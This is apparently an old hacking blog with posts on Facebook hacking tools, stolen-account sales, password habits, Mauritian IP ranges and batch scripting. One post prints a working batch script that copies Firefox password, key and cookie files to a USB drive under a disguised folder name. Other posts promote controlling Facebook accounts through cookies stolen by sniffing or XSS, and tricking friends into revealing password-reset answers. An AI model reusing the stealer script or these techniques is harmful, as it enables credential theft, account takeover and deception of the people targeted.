Facebook rh hack tool is presumed to be a hacking tool allowing hackers to hack a facebook account. Basically facebook hacking tools are in great demand and easily get a big buzz on the net. A quick search on google and you
will find thousands of download links Facebook rh hack tool v1.6 or later but these links seem to go nowhere. From the hacker underground, it is very clear that rh hack tool is a ghost software, it does not exist. It is technically very difficult to develop such a tool, hackers uses a mix of techniques mos commonly SQL injection or phishing to get a hand on facebook accounts. Having a tools that automatically does these things in one go is hoax. So next time you here about a facebook hacking tool, don't even go looking for it. The key to hacking facebook is knowledge and skill.

To end, Facebook rh hacking tool = HOAX .

Control Facebook accounts without the Password - FBController

2010-04-27T15:19:00.000+04:30

FBController - The Ultimate Utility to Control Facebook accounts without the Password.

Let me clear this again like last time that this utility WON'T hack/crack Facebook accounts.

You need to feed it biscuits (cookies) before you can do anything.

You can get the target’s cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, Scroogle search or however you like.

Once you have the cookies you can use FBController to have Full control over the target’s Facebook account.

Login to your Facebook account and sniff your own cookie OR collect a few live Facebook Biscuit/s of your Target/s.
FBConTroller.RAR

==============================================================

Changes in version FBController 2.0

==============================================================

- You don't have to provide each and every cookie variable in the command parameter.

Just save your cookie into a file and point FBC towards it.

- Many changes have taken place over the time in the FB UI and the Cookie structure as explained on the blog.

- FBConTroller v2.0 now has a menu based Operation making it easier to control.

- FBConTroller as of now can Write onto one's own wall, other's walls, Retrieve Profile Page, Retrieve Friends List and even attempts to Retrieve Inbox and Send Messages.

Russian Hacker sells hacked facebook accounts

2010-04-27T14:48:00.001+04:30

A spammer/scammer named Kirloss is selling 1.5 million Facebook accounts for a few pennies apiece. Yours might be one of them.

Want to hear some good news? We now know exactly how much your Facebook profile is worth on the open market: Between 25 and 45 cents, depending on whether you have more than 10 friends.

The bad news? How we found out.

According to Verisign's iDefense, a Russian hacker known as Kirllos is selling 1000 Facebook IDs at a pop for $25 (if you have 10 friends or less) or $45 (if you're in the 11+ friends crowd). Thus explaining that rash of bogus Facebook password reset spam I got last month. He's apparently successfully phished log ons for some 1.5 million Facebookers, which he's now hawking on the antichat.ru forums.

Is your account one of them? There's really no way to know for sure, unless you're seeing stuff posted under your name you didn't put there. But if you've recently responded to an email purporting to be from Facebook asking you to log into your account, there's a very strong chance the answer is yes. (I'd recommend logging in and changing your password to something tricky. Do it right now. Go on, I'll wait.)

What can some miscreant do with your Facebook identity?

* He can use it to infect other Facebook users by posting links on your friends' walls to Web sites containing malware, a la the Koobface worm, which has been tormenting users of Facebook, MySpace, and Twitter for two+ years. Koobface can suck your PC into a botnet, at which point it doesn't really belong to you any more.

* He can use it to run big-money con games on your friends, a la the infamous "London Scam" in which a cybercrook pretends to be an old friend of yours who's stranded overseas and needs you to wire him cash -- fast. The London Scam took at least one U.S. victim for $4,000. Unlike Nigerian 414 scams, which requires mind-numbing stupidity on the part of its victims, the London Scam directly attacks affluent, college-educated, computer literate people. (I had a friend who got approached by the same scammer, who was seriously considering wiring the money until I explained what was going on.)

* He can use it to embarrass, harass, or blackmail you. Want to ruin someone's reputation in a hurry? Log on as them and post humiliating or hateful content on their page.

But here's the bigger threat. Facebook really wants to be the single sign-on engine for the Web (see "What's to like about Facebook's 'Like' button?"). So a Facebook log on isn't just a Facebook log on anymore; it's also a log on to sites like Unvarnished, the Huffington Post, and any others that use Facebook Connect. If that's not an argument against using Facebook for single sign on, I don't know what is. Even if you don't use FB Connect, most people tend to use the same log ons for multiple sites; once a crook has your email address and favorite password, he can go to town on you. Nervous yet?

Bottom line: Your Facebook credentials are important, and only getting more so. If you want to protect yourself online, you'll need to protect them as well. Start by mixing up your passwords for your favorite sites, changing them semi regularly, and not getting duped by every stupid email marked "urgent."

Also: I gotta say I find this whole thing kind of insulting. I've got 700+ friends. I think my account is worth at least $1.50. Don't you?

Facebook Security Issues

2010-04-27T14:43:00.001+04:30

Facebook has been the victim of five different security problems in the month of March, says Trend Micro.

According to the security firm, four hoax applications have become available on the social network along with a new variation of the Koobface virus, which was first detected at the end of last year, and directs users to a fake YouTube page where they are encouraged to install malware.

Two of the hoax applications that have been downloaded by Facebook users include 'F a c e b o o k - closing down!!!' and 'Error Check System'. By downloading the app, users are giving hackers access to their profile and personal information, and also unwittingly forwarding fake messages to their friends, also encouraging them to download the programs.

Rik Ferguson, senior security advisor at Trend Micro told the BBC:"It's been a pretty bad week for social networking in general".

"It's almost as if the applications we have seen this week are a proof of concept," he said. "It would be much better for them to generate rogue applications that did not look like rogue applications."

Ferguson also revealed that he believes hackers are currently working on creating apps that don't initially appear to be malicious. He predicts these apps will appear on social networking sites very soon.

"One of the problems is that Facebook allows anybody to write an application and third party applications are not vetted before they are released to the public. Even as Facebook stamps out one malignant application, it can pop up in another place," said Graham Cluley, senior technology consultant at Sophos

However, it appears Facebook is still refusing to vet apps before they are made available on the social network.

Founder Mark Zuckerberg told Radio One last month: "Our philosophy is that having an open system anyone can participate in is generally better".

Passwords - user password trends (easy to crack passwords)

2010-04-22T15:01:00.002+04:30

It is a disgrace that humans still got the hang of setting passwords. It seems as though that most internet users have inextricably tethered themselves to a promise of not setting strong-enough passwords, which may force hackers to reconsider their choice of profession for its grueling nature. As you devour more of this story, you will begin to envy hackers for having it stroll-in-the-park easy.

A new study has revealed that internet users nonchalantly continue to set unimaginative, fatuous passwords. The study appraised 28,000 passwords that were recently stolen from a U.S website.

Sixteen percent of the users had set their first name as their password. Around fourteen percent chose easiest to recall key combinations, including 1234 and 12345678. Other users, who apparently dont rate their mathematical ability highly, chose to steer clear of numbers and settled for passwords such as AZERTY and QWERTY.

Five percent of the passwords were found to be inspired by popular things and celebrities, including names of movies, TV shows and actors. The strongest password in this category was found to be Ironman as it sounds impenetrable.

Three percent of the people reckon passwords are another medium of expression. How else would you explain passwords like loveyou and Ihateyou..

If you want to set a password that for sure will be very hard to crack, use a combination of alphanumeric characters and special characters like underscores ampersand ect..Adding numbers in the middle of the password is damn effective too..

Hacking Software - Hacking Tools (password cracker)

2010-04-08T17:34:00.002+04:30

So here is the first hacking tool hack website blog is posting: A damn powerful password cracker called

L0phtCrack

Windows password auditing and recovery application
L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as LC6 in 2009. L0phtCrack can provide some decent level of funtionality in the free version but the juice stays in the paid version, so try to crack it or opt for version 5 for which there is already a keygen on the net. For free alternatives, consider Ophcrack, Cain and Abel, or John the Ripper. More posts comming for these hacking tools.

Hacker : White hat and Black Hat

2010-04-08T13:50:00.002+04:30

I thought it would be good to start with something simple and straight forward, so what is a hacker and what kind of hackers are out there..

In common usage, a hacker is a person who breaks into computers, but does no harm. usually for fun or just the challenge . The subculture that has evolved around hackers is often referred to as the computer underground but is now an open community. hackers are people who are motivated by curiosity and adventuress spirit.

Other uses of the word hacker exist that are not related to computer security (computer programmer and home computer hobbyists), but these are rarely used by the mainstream media because of the common stereotype that is in TV and movies. Some would argue that the people that are now considered hackers are not hackers, as before the media described the person who breaks into computers as a hacker there was a hacker community. This community was a community of people who had a large interest in computer programming, often sharing, without restrictions, the source code for the software they wrote. These people now refer to the cyber-criminal hackers as "crackers".

White hat

A white hat hacker breaks security for non-malicious reasons, for instance testing their own security system. This type of hacker enjoys learning and working with computer systems, and consequently gains a deeper understanding of the subject. Such people normally go on to use their hacking skills in legitimate ways, such as becoming security consultants. The word 'hacker' originally included people like this, although a hacker may not be someone into security.

Black Hat

A black hat hacker, sometimes called "cracker", is someone who breaks computer security without authorization or uses technology (usually a computer, phone system or network) for vandalism, credit card fraud, identity theft, piracy, or other types of illegal activity.

Hack website : The hack blog

2010-04-08T13:13:00.000+04:30

Welcome to hack website, a hacking blog that has been remade (previously hackerz-shell) to convert itself to a blog specialised in web hacking.

This is a hack blog where you will learn how to hack : hack the web, hack the net, hack email, learn hacking tricks, hacking cracking, web hacking, hacking forum, hacking website, hacking facebook, hacking software, hacking books and hacking software..Lots of hacking tutorials and books as well as hacking tools to download.So stay tuned because very hot stuff coming to you right away.

Maurice Ile Durable Website hacked

2009-09-26T13:34:00.005+04:30

Maurice Ile Durable project's website was launched i think in March and a short time after, the Website was found to have been hacked.

MIR project grabbed the domain www.maurice-ile-durable.com for this purpose, but for quite an extended period of time instead of the actual website,the website hoster's advertising was displayed on the site. I find it strange that it was OVH web services. A web solution provider from France.
http://www.ovh.com/fr

I suppose a defacement was made and MID decided to remove the contents from the actual hoster. But no atempt was made to implement a backup copy or another version of the website untill recently. Indeed a simple banner indicating that the website will be migrated is being displayed actually on www.maurice-ile-durable.com

That would mean that nothing was done in this whole time to come up with a solution after the defacement.

Anyways, that showz how much MID cares about its online presence and it's only window to the online world. No wonder they implemented a shitty website full of vulns that lead to the easy defacement of it, or maybe not..

When you think of it, who would take the painstaking task of searching for vulns and deface the MID project website. Who would be against the project..

i maybe thinking that the hack may have come from the implementers themself. They got paid less or not at all or something like then then they decided to blow the fuck up. And why they fuck they hosted it with a foreign hoster and not on the government servers.

Actually the website is still hosted (atleast the banner :) ) on a dedicated server at OVH (France)

Anywayz we'll see where they migrate to..

Finding the IP address of your friend on MSN.

2009-09-06T20:38:00.001+04:30

This does not only work for MSN but for also any other messengers : Digsby/Google talk ect...
While several ways exist, i will focus on this one, which i think is the easiest and doesn't require any third party software/script.

What you will need: MSN messenger (of course) and a Command Prompt Window.

1# First close all internet applications like your browser or any other IM softwares you use. (To reduce the number of connections on your box)

2# Login into your Messenger.

3# Copy this line : netstat -n -o 3 >>c:\MSN-iplog.txt

4# Open a command prompt window

5# Get ready to initiate a file transfer to the friend.
(any file that will take atleast 30 seconds to transfer is fine)

6# Paste the line you copied in step 3 to the command prompt and press Enter.
   (The window will be idle, thats normal becuase its writting to disk)

7# Initiate the file transfer to your friend

8# Once the file transfer is complete, wait for 10 seconds and type (control+c)    in the command prompt window (that will stop the logging)

9# Now open the log file named MSN-IPlog created in c:\

10# Search for an IP that was not here at the beginning and at the end of the log but was constantly logged   throughout the middle of the log.

Thats all for now, i may post other methods for finding ips when i have time :))

Skype Users Targeted by Trojan

2009-09-06T00:09:00.002+04:30

You all know of Skype.. That app that allows calls to be made from PC to PC..I used it once, but didn't like the layout and was doughty about it's security.

Well, TrendLabs researchers were alerted of a newly released Proof-of-Concept (PoC) that listens and records voice calls carried out via Skype. Trend Micro detects this as TROJ_SPAYKE.C. Skype is a popular application used for making voice over IP (VoIP) calls.

Upon execution, the DLL component (also detected as TROJ_SPAYKE.C) intercepts Skype traffic and hooks the send and receive APIs. This is done before Skype encrypts the traffic it sends to other users. This enables the Trojan to save all gathered information as audio files, which could then be sent to a malicious user.

This poses no threat as of the moment; it only collects information but does not decrypt the said information and consequently send it to a remote user. However, future attacks that do engage in information theft cannot be rules out.

Users are advised not to give away any crucial information when conversing online to prevent info theft. Trend Micro protects users from this attack through the Trend Micro Smart Protection Network.

Source from: TrendLabs | Malware Blog

My favourite Forum Hacked ? Government Security.Org

2009-09-06T00:06:00.001+04:30

Was Governmentsecurity.org, my favourite security forum hacked?
I do not care for my user credentials that i used there, but i do care for the skills of the hacker that put this up.
But it's not so sure that the forum was hacked but Security Shell did post the stuff on its blog :
Apparently from an el8 hacker named JustRulz

Another underground forum defaced by JustRulz.Think at an new IPB 0-day ?

How I hacked governmentsecurity.org ?

Director: JustRulz ~ naylonsebeke(at)hotmail(dot)com

####################################################################################
-[0x11]- Intro

It was very rainy day haha : xD. . . Ä± was checking recent exploits and testing some of latest kernel bugs on my boxes.
Than,Ä±m entered governmentsecurity.org web page.Their web design is very cool (H) :lol , finally Ä± decided to test
their server security and test my own 0day exploit.

0day exploit for Power Board!!! Dude if that is true, therez practically nothing that could be done against that.

Mari bon li bon ca.. :-|

Facebook : SQL Injection Flaw

2009-09-06T00:00:00.001+04:30

Facebook, a website with an estimated of 5 to 10 Million in US Dollars, a number of 250-1000 employees, a website ranked number 8 GLOBALLY by alexa.com’s traffic standards, is not capable of securing their data base. Millions (LOTS OF MILLIONS) of accounts, email addresses and passwords up for grabs by anyone. Let me show you a few concrete examples of vulnerable parameters.
Source: Hacker Underground

Not only is the website vulnerable to sql injection but it also allows load_file to be executed making it very dangerous because with a little patience, a writable directory can be found and injection a malicious code we get command line access with wich we can do virtualy anything we want with the website: upload phpshells, redirects, INFECT PAGES WITH TROJAN DROPPERS, even deface the whole website.

Basically, Facebook is no safer than any other site, but given the huge benefits it makes, it got the resources to pay its attackers so that the info is not made public. But nevertheless, those who are not interested in money but security do make these info public.
Facebook has also been found to be vulnerable to Blind SQL.

Emtel IP address range

2009-09-04T17:24:00.003+04:30

I came to know of this range recently.

196.192.80.0 - 196.192.83.255
Emtel GSM 2G & 3G

Click here for a full list of Mauritian IP ranges.

Sending Fake Emails to anyone

2009-09-04T03:15:00.000+04:30

I have seen this being spammed over the net by script kiddies pretending that it allows faked emails to be sent to any phone number.
Indeed this trick can send forged emails to any mobile number.

For example you could send a mail appearing to originate from your friends email address to his mobile.
Am sure he/she will be wondering WTF happened.. Did my email acc get hacked.

How to do it?

Grab a Nokia phone.
Go to Messages and Select SMS e-mail
In the E-mail address field, enter the fake email you want. (anyone that you like)
Input the Subject and the message contents
Now the trick:
Instead of inputting the E-mail Server Number, input your friends mobile number
Send

Your friend will receive an email message originating from the email address you set

But:
Works only with retarded persons who wouldn't check the Advanced Message details.
Indeed your number appears as the E-mail Server Number in Message Details.
That is if your friend understands what an email server is and if he bothers to check the number in his phonebook.

I tried that one and works out very well. Tested on Emtel network.
Very nice to pull pranks on stupid friends.

Social Engineering

2009-09-04T03:12:00.001+04:30

Social Engineering is the art of manipulating a person into revealing sensitive information. Social Engineering is the best hacking tool you can use, in my opinion. Similar to using a computer program to make another system spew out amounts of valuable information about the machine, that an attacker can later use. Think of it as "people hacking". When hacking into system you find a weakness or vulnerability that you can exploit, to gain access to restricted information. Social engineering is taking advantage of a persons weakness and getting them to disclose confidential information. All it takes is a large amount a confidence and basic knowledge of human nature and social behavior patterns. Social engineering does not just apply to computer security, it can apply to nearly any situation.

My examples in computer security include chatting with persons and make them split out their hobbies, interests and stuffs like that. It is surprising to see how people tend to put passwords that directly relate to what they like or what they do.

For example there is a great chance that a hardcore fan of transformers would set his passwords as the name of one of the decepticons, concepticons or whatever.

Another example is when you want to trick your friend into giving out his email password. Naturally no one will blatantly give out his password, but you can trick him as to make him split the answer to the secret question that allows resetting of an email password. (bat lakol )
Tip: Neva write something true while setting your secret answer.

This is just the tip of the iceberg when it comes to social engineering. There is much more to cover, but I hope you all learned something. Overtime you will become better at reading and understanding human nature. You will develop your own style of social engineering. There are many more methods that I left out, but these are great to start with. Knowing how to social engineer is a great way to prevent yourself from getting tricked by others. For example, the police use social engineering and forms of manipulation constantly. Others may disagree, but overall I feel this is an important topic to cover.

Stealing FireFox Passwords

2009-09-04T03:07:00.000+04:30

Firefox stores saved passwords and login info in encrypted files in the Application data directory.
I am posting a batch file that can grab these files and send them to a removable device.

This batch file has been written by illwill from gso forum and worked for versions 3.5 and below.
I tweaked it a bit for it to work on 3.5 and above.
When run, the program copies the files to a folder GenuineCheck\Msdos on the following removable drives: E,F,G,H
So for it to work, you must create a folder named GenuineCheck and within;Msdos in your removable drive.
This is to avoid that the files are saved to unintended areas.

Naturally, the files are encryted, use FirePassword to decrypt them.

The code is here:

ECHO OFF
COLOR F0
TITLE=::: Firefox Pass Grabber :::

CLS

VER | findstr /i "5.1." > nul
PUSHD "%UserProfile%\Application Data\Mozilla\Firefox"
IF NOT ERRORLEVEL 1 FOR /F "tokens=2 delims==" %%A IN ('TYPE profiles.ini ^| FINDSTR.EXE /R /B /I /C:"Path="') DO SET Profile=%%~nxA
set signons="%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\signons.sqlite"
set key="%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\key3.db"
set coo="%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\cookies.sqlite"
set cert="%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\cert8.db"

goto Send

:Send
copy %key% E:\GenuineCheck\Msdos\key3.db
copy %key% F:\GenuineCheck\Msdos\key3.db
copy %key% G:\GenuineCheck\Msdos\key3.db
copy %key% H:\GenuineCheck\Msdos\key3.db

copy %signons% E:\GenuineCheck\Msdos\signons.sqlite
copy %signons% F:\GenuineCheck\Msdos\signons.sqlite
copy %signons% G:\GenuineCheck\Msdos\signons.sqlite
copy %signons% H:\GenuineCheck\Msdos\signons.sqlite

copy %coo% E:\GenuineCheck\Msdos\cookies.sqlite
copy %coo% F:\GenuineCheck\Msdos\cookies.sqlite
copy %coo% G:\GenuineCheck\Msdos\cookies.sqlite
copy %coo% H:\GenuineCheck\Msdos\cookies.sqlite

copy %cert% E:\GenuineCheck\Msdos\cert8.db
copy %cert% F:\GenuineCheck\Msdos\cert8.db
copy %cert% G:\GenuineCheck\Msdos\cert8.db
copy %cert% H:\GenuineCheck\Msdos\cert8.db

ECHO.
ECHO==============================================
ECHO.
ECHO Files haved been saved
ECHO.
ECHO==============================================
ECHO.
PAUSE

Writing Batch Programs

2009-09-04T03:03:00.001+04:30

First of all, what is a batch program?
A batch program, also known as a batch file executed a list of commands when run.

#What commands?
Run-->type (cmd)-->help

All these commands can be added to a batch file to be executed.
They are very very useful ;)

#Creating batch files.

Just create a file with the .bat extension
I would recommend creating it using cmd as it would allow you to get a hold of the environment.
Open a cmd window. (Run-->type (cmd)
At the prompt, type: ECHO pause >> c:\mybatch.bat
This will create a batch file in your c:\ directory.
Don't bother about the ECHO and stuff, you will understand in due time.

Now run the created file.
You will get a cmd window asking you to press any key, this is because of the pause command that we directed to the file.

To edit the file, right click and edit. A notepad will open with the first line as "pause"

#Writing your batch file.

Delete the pause line.
Type the following:
ECHO OFF               (this insures that actual commands are not displayed when the file is run)
CLS                    (this clears the screen after the ECHO OFF command has been displayed)
TITLE=Shell            (this set the window title as "shell")
ECHO My name is Farell (this outputs "My name is Farell" in the window)
PAUSE                  (this prevents the program from existing right after executing the commands)

You should get a window like the one below..

#Other things you can do

ECHO OFF
CLS
SET /p myname=Enter you name:
ECHO==============================
ECHO.
ECHO %myname% is fan of hax0rs-sh3ll
ECHO.
ECHO==============================
PAUSE

You should get a window like the one below:

Explanation:
The [set /p myname=]   Asks user for input (/p) and store it in the variable "myname"
[ECHO.]                Displays a blank line on the screen
ECHO [%myname%]        Displays the contents of the variable "myname"

You can set a lot of things using set /p.. The rest is up to your imagination. Type help in cmd :)

#Cool Stuffs

Saving system environment to file.
This batch file will save system info like machine name, user profile path and username to a file named sysinfo.txt
System environment variables can be viewed by typing "set" at a cmd prompt.
As they are variables already defined in cmd, we just need to call them.

ECHO OFF
CLS
SET FILE=c:\sysinfo.txt
ECHO %logonserver% >>%file%
ECHO %userprofile% >>%file%
ECHO %username% >>%file%
ECHO ((Info Saved))
PAUSE

Explanation:
The >> operator saves the output of the command to the variable %file%

Ending note::
There are a lot of things you can do with batch file, search the net for more tutorial and info.
I will be posting a batch file that copies file contents to a USB disk. Stay rooted :)

Mauritian IP addresses

2009-09-04T03:00:00.001+04:30

IP ranges of MRU ISPs
It is good to know the RIR too
Regional Internet Registries

Registry           Geographic Region
AfriNIC    Africa, portions of the Indian Ocean
APNIC             Portions of Asia, portions of Oceania
ARIN               Canada, many Caribbean and North Atlantic islands, and the United States
LACNIC          Latin America, portions of the Caribbean
RIPE NCC       Europe, the Middle East, Central Asia

Mauritius Internet Service providers and their IP range.

#TelecomPlus
196.27.64.0 - 196.27.79.255
196.27.80.0 - 196.27.95.255
Dynamic adsl pool

202.123.0.0 - 202.123.31.255
Dialup pool

#Orange
41.212.128.0 - 41.212.255.255
adsl-pool

#Nomad[NetworkPlus]
41.207.143.0 - 41.207.144.255

41.207.137.0 - 41.207.138.255
Dynamic Wireless - BTS ROSE HILL 2

41.207.138.0 - 41.207.138.255
Dynamic Wireless - La Marie

41.207.139.0 - 41.207.139.255
Dynamic Wireless - Floreal

41.207.140.0 - 41.207.140.255
Dynamic Wireless - Phoenix

41.207.143.0 - 41.207.143.255
Dynamic Wireless - Curepipe

#Data Communications Ltd
196.192.64.0 - 196.192.71.255
Proxy Server @ 196.192.68.8
DCLISP [smartnet and adsl]